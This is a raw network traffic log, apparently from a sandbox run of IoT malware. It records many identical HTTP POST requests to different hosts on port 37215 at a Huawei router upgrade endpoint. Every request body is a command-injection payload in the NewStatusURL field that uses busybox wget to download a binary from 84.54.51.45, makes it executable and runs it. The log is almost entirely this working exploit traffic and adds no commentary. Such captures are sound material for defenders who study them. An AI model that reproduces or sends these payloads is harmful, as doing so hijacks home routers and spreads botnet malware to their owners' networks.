                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2289192.168.2.155209441.183.227.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673794985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2290192.168.2.154876641.36.86.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673805952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2291192.168.2.153747041.220.215.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673816919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2292192.168.2.154397041.217.116.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673856974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2293192.168.2.154153641.10.62.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673857927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2294192.168.2.154666641.135.215.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673857927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2295192.168.2.155362441.170.126.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673886061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2296192.168.2.155417641.222.197.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.674196959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2297192.168.2.154804041.196.77.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.674427986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2298192.168.2.154929441.232.97.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.674457073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
